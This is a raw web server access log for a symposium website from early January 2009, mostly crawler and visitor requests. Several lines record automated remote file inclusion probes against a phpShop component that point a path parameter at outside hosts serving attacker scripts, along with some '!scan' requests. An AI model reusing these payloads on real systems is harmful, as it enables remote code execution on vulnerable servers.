85.158.181.12 - - [04/Jan/2009:00:50:39 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kangwon.ac.kr/~faculty/kboard/data/mboenk/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
85.158.181.12 - - [04/Jan/2009:00:50:39 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kangwon.ac.kr/~faculty/kboard/data/mboenk/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
85.158.181.12 - - [04/Jan/2009:00:50:40 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kangwon.ac.kr/~faculty/kboard/data/mboenk/ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
61.247.221.44 - - [04/Jan/2009:02:37:57 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" 0 www.geil-symposium.com
61.247.221.44 - - [04/Jan/2009:02:37:57 -0500] "GET / HTTP/1.1" 200 326 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" 0 www.geil-symposium.com
208.111.154.16 - - [04/Jan/2009:04:44:09 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
124.115.2.237 - - [04/Jan/2009:05:07:47 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.2.237 - - [04/Jan/2009:05:07:53 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
66.235.124.38 - - [04/Jan/2009:08:52:38 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [04/Jan/2009:08:52:38 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
124.115.2.237 - - [04/Jan/2009:08:55:40 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.2.237 - - [04/Jan/2009:08:55:50 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
67.195.37.156 - - [04/Jan/2009:09:13:18 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [04/Jan/2009:09:13:19 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.45 - - [04/Jan/2009:10:04:16 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; SDS IE6 SP1)" 0 www.geil-symposium.com
124.115.2.237 - - [04/Jan/2009:12:35:22 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
61.135.168.39 - - [04/Jan/2009:13:09:14 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
124.115.2.237 - - [04/Jan/2009:16:15:31 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.2.237 - - [04/Jan/2009:16:15:40 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
220.181.32.49 - - [04/Jan/2009:17:49:58 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
208.111.154.15 - - [04/Jan/2009:18:41:42 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [04/Jan/2009:18:41:42 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
124.115.2.237 - - [04/Jan/2009:19:49:31 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.2.237 - - [04/Jan/2009:19:49:49 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
66.249.71.105 - - [04/Jan/2009:20:48:34 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.105 - - [04/Jan/2009:20:48:34 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
208.80.194.120 - - [04/Jan/2009:20:58:37 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; yie6_SBC; SV1; FunWebProducts; SpamBlockerUtility 4.6.1; HbTools 4.7.2; yplus 5.1.03b)" 0 www.geil-symposium.com
74.6.18.253 - - [05/Jan/2009:01:32:22 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.253 - - [05/Jan/2009:01:32:22 -0500] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.253 - - [05/Jan/2009:01:32:23 -0500] "GET /logs/ HTTP/1.0" 200 434 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
220.181.32.49 - - [05/Jan/2009:04:16:18 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
220.181.32.77 - - [05/Jan/2009:04:55:26 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
86.86.114.58 - - [05/Jan/2009:06:03:30 -0500] "GET / HTTP/1.1" 200 326 "http://www.google.nl/search?hl=nl&q=parent+directory+%2B+geil&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
86.86.114.58 - - [05/Jan/2009:06:03:32 -0500] "GET /logs HTTP/1.1" 301 343 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
86.86.114.58 - - [05/Jan/2009:06:03:32 -0500] "GET /logs/ HTTP/1.1" 200 450 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
38.99.13.124 - - [05/Jan/2009:07:01:27 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
74.6.22.101 - - [05/Jan/2009:07:32:14 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.101 - - [05/Jan/2009:07:32:14 -0500] "GET /logs/access.log.20081202.gz HTTP/1.0" 200 52932 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.16 - - [05/Jan/2009:08:09:41 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
61.135.168.39 - - [05/Jan/2009:08:09:57 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
220.181.32.22 - - [05/Jan/2009:08:10:35 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
67.195.37.156 - - [05/Jan/2009:08:21:20 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [05/Jan/2009:08:21:21 -0500] "GET /logs/error.log HTTP/1.0" 200 208402 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.101 - - [05/Jan/2009:09:14:25 -0500] "GET /logs/ HTTP/1.0" 200 438 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [05/Jan/2009:10:11:56 -0500] "GET /logs/error.log HTTP/1.0" 200 208402 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
125.34.145.129 - - [05/Jan/2009:14:17:24 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla" 0 www.geil-symposium.com
125.34.145.129 - - [05/Jan/2009:14:17:25 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla" 0 www.geil-symposium.com
220.181.32.49 - - [05/Jan/2009:15:51:55 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
74.6.18.253 - - [05/Jan/2009:15:59:11 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.253 - - [05/Jan/2009:15:59:11 -0500] "GET /logs/access.log.20081202.gz HTTP/1.0" 200 52932 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.39 - - [05/Jan/2009:16:01:19 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Ringo; InfoPath.2)" 0 www.geil-symposium.com
124.115.4.203 - - [05/Jan/2009:19:29:43 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.4.203 - - [05/Jan/2009:19:29:43 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
208.111.154.15 - - [05/Jan/2009:19:44:31 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [05/Jan/2009:19:44:32 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
67.195.37.156 - - [05/Jan/2009:19:57:56 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [05/Jan/2009:19:57:57 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [05/Jan/2009:19:58:39 -0500] "GET /logs/ HTTP/1.0" 200 438 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [05/Jan/2009:20:02:30 -0500] "GET /logs/access.log.20081202.gz HTTP/1.0" 200 52932 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
124.115.4.203 - - [05/Jan/2009:22:00:30 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.4.203 - - [05/Jan/2009:22:00:31 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
61.100.7.75 - - [05/Jan/2009:22:07:18 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" 0 www.geil-symposium.com
61.100.7.75 - - [05/Jan/2009:22:07:18 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" 0 www.geil-symposium.com
61.100.7.75 - - [05/Jan/2009:22:07:18 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" 0 www.geil-symposium.com
222.237.76.32 - - [05/Jan/2009:22:07:52 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 0 www.geil-symposium.com
222.237.76.32 - - [05/Jan/2009:22:07:52 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 0 www.geil-symposium.com
222.237.76.32 - - [05/Jan/2009:22:07:52 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" 0 www.geil-symposium.com
61.100.7.75 - - [05/Jan/2009:22:39:18 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" 0 www.geil-symposium.com
61.100.7.75 - - [05/Jan/2009:22:39:18 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" 0 www.geil-symposium.com
61.100.7.75 - - [05/Jan/2009:22:39:18 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://morebb.com/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" 0 www.geil-symposium.com
220.181.32.22 - - [05/Jan/2009:23:11:30 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
124.115.0.111 - - [06/Jan/2009:00:38:33 -0500] "HEAD / HTTP/1.1" 200 0 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
124.115.0.111 - - [06/Jan/2009:00:38:34 -0500] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
208.80.194.48 - - [06/Jan/2009:04:57:45 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={2D2C88FD-7CA3-4fba-88F0-D3C6CD3A919E})" 0 www.geil-symposium.com
220.181.32.49 - - [06/Jan/2009:07:15:04 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
64.246.165.180 - - [06/Jan/2009:08:25:16 -0500] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
64.246.165.180 - - [06/Jan/2009:08:25:16 -0500] "GET / HTTP/1.1" 200 326 "http://whois.domaintools.com/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
131.107.151.157 - - [06/Jan/2009:12:07:04 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
208.111.154.16 - - [06/Jan/2009:12:27:48 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
174.129.151.201 - - [06/Jan/2009:14:00:15 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 0 www.geil-symposium.com
220.181.32.22 - - [06/Jan/2009:14:10:26 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
129.110.242.7 - - [06/Jan/2009:15:19:07 -0500] "GET /publications.html HTTP/1.1" 404 - "http://www.nationmaster.com/encyclopedia/Polyethylene-naphthalate" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5" 0 www.geil-symposium.com
129.110.242.7 - - [06/Jan/2009:15:19:08 -0500] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5" 0 www.geil-symposium.com
129.110.242.7 - - [06/Jan/2009:15:19:11 -0500] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5" 0 www.geil-symposium.com
61.135.168.39 - - [06/Jan/2009:16:08:12 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
208.80.194.49 - - [06/Jan/2009:17:10:30 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sbcydsl 3.12; YPC 3.2.0; yplus 5.1.03b)" 0 www.geil-symposium.com
131.107.65.41 - - [06/Jan/2009:17:25:45 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "MSR-ISRCCrawler" 0 www.geil-symposium.com
131.107.65.41 - - [06/Jan/2009:17:25:46 -0500] "GET / HTTP/1.1" 200 326 "-" "MSR-ISRCCrawler" 0 www.geil-symposium.com
220.181.32.22 - - [06/Jan/2009:18:10:25 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
67.195.37.156 - - [06/Jan/2009:18:51:34 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [06/Jan/2009:18:51:35 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [06/Jan/2009:18:51:44 -0500] "GET /logs/ HTTP/1.0" 200 438 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
71.135.236.228 - - [06/Jan/2009:20:47:29 -0500] "GET / HTTP/1.0" 200 310 "http://fzyuoig.steadywebs.com/minimun_credit_score_for_mortgage_approval.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
71.135.236.228 - - [06/Jan/2009:20:47:33 -0500] "GET / HTTP/1.0" 200 310 "http://fzyuoig.steadywebs.com/minimun_credit_score_for_mortgage_approval.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
71.135.236.228 - - [06/Jan/2009:20:47:34 -0500] "GET / HTTP/1.0" 200 310 "http://fzyuoig.steadywebs.com/minimun_credit_score_for_mortgage_approval.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
71.135.236.228 - - [06/Jan/2009:20:47:37 -0500] "GET / HTTP/1.0" 200 310 "http://fzyuoig.steadywebs.com/minimun_credit_score_for_mortgage_approval.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
68.42.173.15 - - [06/Jan/2009:20:48:19 -0500] "GET / HTTP/1.0" 200 310 "http://lwvuaaf.00freehost.com/auto_insurance_rates_texas.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2" 0 www.geil-symposium.com
68.42.173.15 - - [06/Jan/2009:20:48:30 -0500] "GET / HTTP/1.0" 200 310 "http://lwvuaaf.00freehost.com/auto_insurance_rates_texas.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2" 0 www.geil-symposium.com
68.42.173.15 - - [06/Jan/2009:20:48:35 -0500] "GET / HTTP/1.0" 200 310 "http://lwvuaaf.00freehost.com/auto_insurance_rates_texas.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2" 0 www.geil-symposium.com
68.42.173.15 - - [06/Jan/2009:20:48:43 -0500] "GET / HTTP/1.0" 200 310 "http://lwvuaaf.00freehost.com/auto_insurance_rates_texas.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2" 0 www.geil-symposium.com
203.209.252.68 - - [06/Jan/2009:20:50:29 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [06/Jan/2009:20:50:44 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
206.163.123.217 - - [07/Jan/2009:02:24:29 -0500] "GET / HTTP/1.1" 200 322 "http://geil-symposium.com/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1" 0 www.geil-symposium.com
206.163.123.217 - - [07/Jan/2009:02:24:32 -0500] "GET /logs HTTP/1.1" 301 335 "http://geil-symposium.com/logs" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1" 0 www.geil-symposium.com
206.163.123.217 - - [07/Jan/2009:02:24:33 -0500] "GET /logs/ HTTP/1.1" 200 446 "http://geil-symposium.com/logs" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1" 0 www.geil-symposium.com
206.163.123.217 - - [07/Jan/2009:02:24:41 -0500] "GET /logs/access.log HTTP/1.1" 200 82257 "http://geil-symposium.com/logs/access.log" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1" 3 www.geil-symposium.com
206.163.123.217 - - [07/Jan/2009:02:24:46 -0500] "GET /logs/error.log HTTP/1.1" 200 169137 "http://geil-symposium.com/logs/error.log" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1" 1 www.geil-symposium.com
208.111.154.15 - - [07/Jan/2009:03:25:46 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [07/Jan/2009:03:25:46 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.80.194.54 - - [07/Jan/2009:04:43:46 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {98CE85A2-3117-0414-8233-D93E5FF82363}; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
66.235.124.38 - - [07/Jan/2009:04:57:49 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [07/Jan/2009:04:57:49 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
208.80.194.37 - - [07/Jan/2009:08:36:17 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 2.8; FDM; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
91.121.65.125 - - [07/Jan/2009:09:03:57 -0500] "GET /logs/error.log/!scanhttp://www.vampirewear.com/11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
91.121.65.125 - - [07/Jan/2009:09:03:57 -0500] "GET /!scanhttp://www.vampirewear.com/11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
91.121.65.125 - - [07/Jan/2009:09:03:57 -0500] "GET /logs/!scanhttp://www.vampirewear.com/11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
208.80.194.56 - - [07/Jan/2009:12:03:52 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; PowerSearch 2.07; SV1; FreeprodTB; .NET CLR 1.0.3705)" 0 www.geil-symposium.com
72.30.81.177 - - [07/Jan/2009:12:07:34 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.81.177 - - [07/Jan/2009:12:07:36 -0500] "GET /logs/access.log HTTP/1.0" 200 297905 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.175 - - [07/Jan/2009:12:15:39 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.175 - - [07/Jan/2009:12:15:39 -0500] "GET /Registration.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
